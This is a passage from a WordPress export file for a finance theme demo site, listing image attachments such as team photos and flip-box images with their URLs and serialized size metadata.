		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[testi3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/testi3.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/testi3.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:90;s:6:"height";i:90;s:4:"file";s:20:"2020/09/testi3.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/bg2-about-us/</link>
		<pubDate>Tue, 08 Sep 2020 04:13:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>520</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:13:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:13:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg2-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:938;s:4:"file";s:26:"2020/09/bg2-about-us.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:26:"bg2-about-us-1-300x147.jpg";s:5:"width";i:300;s:6:"height";i:147;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"bg2-about-us-1-1024x500.jpg";s:5:"width";i:1024;s:6:"height";i:500;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"bg2-about-us-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"bg2-about-us-1-768x375.jpg";s:5:"width";i:768;s:6:"height";i:375;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:27:"bg2-about-us-1-1536x750.jpg";s:5:"width";i:1536;s:6:"height";i:750;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"bg2-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"bg2-about-us-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:27:"bg2-about-us-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:27:"bg2-about-us-1-1200x938.jpg";s:5:"width";i:1200;s:6:"height";i:938;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/team1/</link>
		<pubDate>Tue, 08 Sep 2020 04:36:18 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>524</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:36:18]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:36:18]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:19:"2020/09/team1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:19:"team1-1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"team1-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"team1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"team1-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"team1-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/team2/</link>
		<pubDate>Tue, 08 Sep 2020 04:36:20 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>525</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:36:20]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:36:20]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:19:"2020/09/team2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:19:"team2-1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"team2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"team2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"team2-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"team2-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/team3/</link>
		<pubDate>Tue, 08 Sep 2020 04:36:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>526</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:36:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:36:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:19:"2020/09/team3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:19:"team3-1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"team3-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"team3-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"team3-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"team3-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/team4/</link>
		<pubDate>Tue, 08 Sep 2020 04:36:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>527</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:36:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:36:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:19:"2020/09/team4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:19:"team4-1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"team4-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"team4-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"team4-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"team4-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-core-values/pheader-value/</link>
		<pubDate>Tue, 08 Sep 2020 04:49:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>531</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:49:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:49:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:27:"2020/09/pheader-value.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:26:"pheader-value-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"pheader-value-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"pheader-value-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"pheader-value-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:28:"pheader-value-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"pheader-value-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"pheader-value-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:28:"pheader-value-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:28:"pheader-value-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>flip-box1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-core-values/flip-box1/</link>
		<pubDate>Tue, 08 Sep 2020 07:02:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>533</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:02:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:02:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[flip-box1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/flip-box1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:649;s:4:"file";s:23:"2020/09/flip-box1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"flip-box1-1-300x260.jpg";s:5:"width";i:300;s:6:"height";i:260;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"flip-box1-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"flip-box1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"flip-box1-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"flip-box1-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>flip-box2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-core-values/flip-box2/</link>
		<pubDate>Tue, 08 Sep 2020 07:02:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>534</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:02:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:02:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[flip-box2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/flip-box2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:649;s:4:"file";s:23:"2020/09/flip-box2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"flip-box2-1-300x260.jpg";s:5:"width";i:300;s:6:"height";i:260;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"flip-box2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"flip-box2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"flip-box2-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"flip-box2-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>flip-box3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-core-values/flip-box3/</link>
		<pubDate>Tue, 08 Sep 2020 07:02:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>535</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:02:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:02:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[flip-box3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/flip-box3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
